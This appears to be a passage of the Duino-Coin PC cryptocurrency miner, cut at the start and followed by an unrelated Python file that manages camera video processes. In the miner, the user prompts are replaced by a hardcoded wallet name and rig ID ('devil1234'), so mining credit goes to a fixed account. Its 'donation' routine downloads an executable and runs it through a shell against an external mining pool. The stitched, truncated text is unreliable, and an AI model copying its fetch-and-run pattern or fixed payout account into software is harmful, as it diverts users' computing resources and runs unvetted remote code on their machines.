+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed - "
+ "Xxhash support will be disabled")
xxhash_enabled = False
# Global variables
MINER_VER = "2.56" # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2813, # PC (1)
2814, # PC (2)
2815, # PC (3)
2812, # Wallets, other miners
2811 # Legacy
]
SOC_TIMEOUT = 45 # Socket timeout
PERIODIC_REPORT_TIME = 60
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
pretty_print(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
    # Check the largest unit first so the minute and hour branches are reachable
    uptime = time() - start_time
    if uptime >= 3600:
        return str(round(uptime // 3600)) + " hours"
    elif uptime >= 60:
        return str(round(uptime // 60)) + " minutes"
    else:
        return str(round(uptime)) + " seconds"
def get_prefix(diff: int):
if diff >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif diff >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif diff >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.YELLOW
+ getString("translation_autor"))
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " ⚙ "
+ diffName)
if rig_identiier != "None":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if int(donation_level) > 0:
if osname == "nt":
if not Path(RESOURCES_DIR + "/Donate_executable.exe").is_file():
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableAARCH64?raw=true")
elif osprocessor() == "armv7l":
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableAARCH32?raw=true")
else:
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableLinux?raw=true")
if not Path(RESOURCES_DIR + "/Donate_executable").is_file():
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable", "wb") as f:
f.write(r.content)
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
global PERIODIC_REPORT_TIME
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = "devil1234"
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = "95"
threadcount = "8"
requested_diff = "2"
rig_identiier = "devil1234"
donation_level = "0"
    # Check whether efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
    # Check whether threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
    # Check whether algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
    # Check whether diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "MEDIUM"
    # Check whether donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 45,
"periodic_report": 60,
"discord_presence": "y"
}
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-PC-Miner"]["periodic_report"])
efficiency = (100 - float(efficiency)) * 0.01
def Donate():
global donation_level
global donatorrunning
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ RESOURCES_DIR
+ "& Donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:3333 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ RESOURCES_DIR
+ "&& chmod +x Donate_executable "
+ "&& ./Donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:3333 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donation_level) <= 0:
pretty_print(
"sys0",
Fore.YELLOW
+ getString("free_network_warning")
+ getString("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ getString("learn_more_donate"),
"warning")
sleep(10)
elif donatorrunning == False:
if int(donation_level) == 5:
cmd += "80"
elif int(donation_level) == 4:
cmd += "60"
elif int(donation_level) == 3:
cmd += "40"
elif int(donation_level) == 2:
cmd += "20"
elif int(donation_level) == 1:
cmd += "10"
if int(donation_level) > 0:
debug_output(getString("starting_donation"))
donatorrunning = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
pretty_print(
"sys0",
getString("thanks_donation"),
"warning")
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
    # Loop from 0 to 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
    # Loop from 0 to 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
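# --- Illustrative helper (ours, never called by the miner) ---
# Both mining loops above search for a nonce such that hashing the last block
# hash concatenated with the nonce reproduces the expected hash handed out by
# the node. For DUCO-S1 that check boils down to:
def _verify_ducos1_share(last_block_hash, expected_hash, nonce):
    digest = sha1((str(last_block_hash) + str(nonce)).encode("ascii")).hexdigest()
    return digest == expected_hash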
def Thread(
threadid: int,
accepted: int,
rejected: int,
requested_diff: str,
khashcount: int,
username: str,
efficiency: int,
rig_identiier: str,
algorithm: str,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS: str,
NODE_PORT: int):
# Mining section for every thread
start_time = time()
report_shares = 0
while True:
while True:
try:
retry_counter = 0
while True:
try:
if retry_counter >= 3:
debug_output(
'Error connecting after 3 retries, '
+ 'fetching new node IP')
NODE_ADDRESS, NODE_PORT = fetch_pools()
debug_output('Connecting to node ' +
str(NODE_ADDRESS) + ":" + str(NODE_PORT))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if server_version:
break
except Exception as e:
retry_counter += 1
pretty_print("net0",
" Error connecting to mining node: "
+ str(e)
+ ", retrying in 5s",
"error")
sleep(5)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
if threadid == 0:
if float(server_version) <= float(MINER_VER):
# Miner is up-to-date
pretty_print(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(server_version)
+ ", node: "
+ str(NODE_ADDRESS)
+ ":"
+ str(NODE_PORT)
+ ")",
"success")
else:
# Miner is outdated
pretty_print(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
sleep(5)
break
except Exception as e:
# Socket connection error
pretty_print(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
pretty_print(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
pretty_print("cpu" + str(threadid),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all thrads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
pretty_print("sys0",
" " +
getString("max_hashrate_notice"),
"warning")
diff = get_prefix(diff)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ⛏"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ⛏"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = accepted.value - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
totalhashrate,
uptime)
start_time = time()
break
break
except Exception as e:
pretty_print(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" Periodic mining report (BETA): "
+ Fore.RESET
+ Style.NORMAL
+ "\n\t\t‖ During the last "
+ str(seconds)
+ " seconds"
+ "\n\t\t‖ You've mined "
+ str(shares)
+ " shares ("
+ str(round(shares/seconds, 1))
+ " shares/s)"
+ "\n\t\t‖ With the hashrate of "
+ str(int(hashrate)) + " kH/s"
+ "\n\t\t‖ In this time period, you've solved "
+ str(int(hashrate*seconds))
+ " hashes"
+ "\n\t\t‖ Total miner uptime: "
+ str(uptime), "success")
def pretty_print(message_type, message, state):
# Prints colored output messages
    # Select background color based on the message source (net/cpu/sys)
    if message_type.startswith("net"):
        background = Back.BLUE
    elif message_type.startswith("cpu"):
        background = Back.YELLOW
    elif message_type.startswith("sys"):
        background = Back.GREEN
    else:
        background = Back.RESET
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(5).decode()
except:
continue
            if server_version == "":  # recv returned nothing: connection not ready or closed
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(4)
return ready_connections[0].getpeername()[1]
def fetch_pools():
while True:
pretty_print("net0",
" "
+ getString("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
pretty_print("net0",
" Retrieved mining node: "
+ Fore.RESET
+ Style.NORMAL
+ str(response["name"]),
"success")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
title(getString("duco_python_miner") + str(MINER_VER) + ")")
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
pretty_print(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
pretty_print(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
# Start donation thread
Donate()
except Exception as e:
debug_output("Error launching donation thread: " + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except:
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS,
NODE_PORT))
thread[x].start()
if x > 4 and x % 4 == 0:
# Don't launch burst of threads
# to not get banned
sleep(5)
else:
sleep(0.1)
except Exception as e:
pretty_print(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
process.py
|
import multiprocessing
import os
import signal
import sys
import time
from pyramid.paster import get_appsettings
from threading import Thread
from .http import create_server
from ..models import (
get_engine,
get_session_factory,
Camera,
)
from .video import VideoStream
class ExitException(Exception):
pass
def sigterm_handler(signal_number, stack_frame):
raise ExitException
class VideoProcess(multiprocessing.Process):
def __init__(self, camera, dbsession):
super(VideoProcess, self).__init__()
self.camera = camera
self.dbsession = dbsession
self.exit = multiprocessing.Event()
def run(self):
try:
video_stream = VideoStream(
num=self.camera.src,
detection=self.camera.detection_enabled)
video_stream.start()
server = create_server(
self.camera.host, self.camera.port, video_stream)
thread = Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
while not self.exit.is_set():
self.dbsession.refresh(self.camera)
if not self.camera.enabled:
self.shutdown()
return
video_stream.detection = self.camera.detection_enabled
time.sleep(0.5)
except ExitException:
video_stream.stop()
server.shutdown()
video_stream.join()
thread.join()
def shutdown(self):
self.exit.set()
def start_processes(processes, dbsession):
    # Clean up any processes that have already exited
for p in [p for p in processes if not p.is_alive()]:
processes.remove(p)
cams = dbsession.query(Camera).filter_by(enabled=True).all()
started_cams = [p.camera for p in processes]
for cam in cams:
if cam not in started_cams:
# start missing process
p = VideoProcess(cam, dbsession)
processes.append(p)
p.start()
def run(dbsession):
signal.signal(signal.SIGTERM, sigterm_handler)
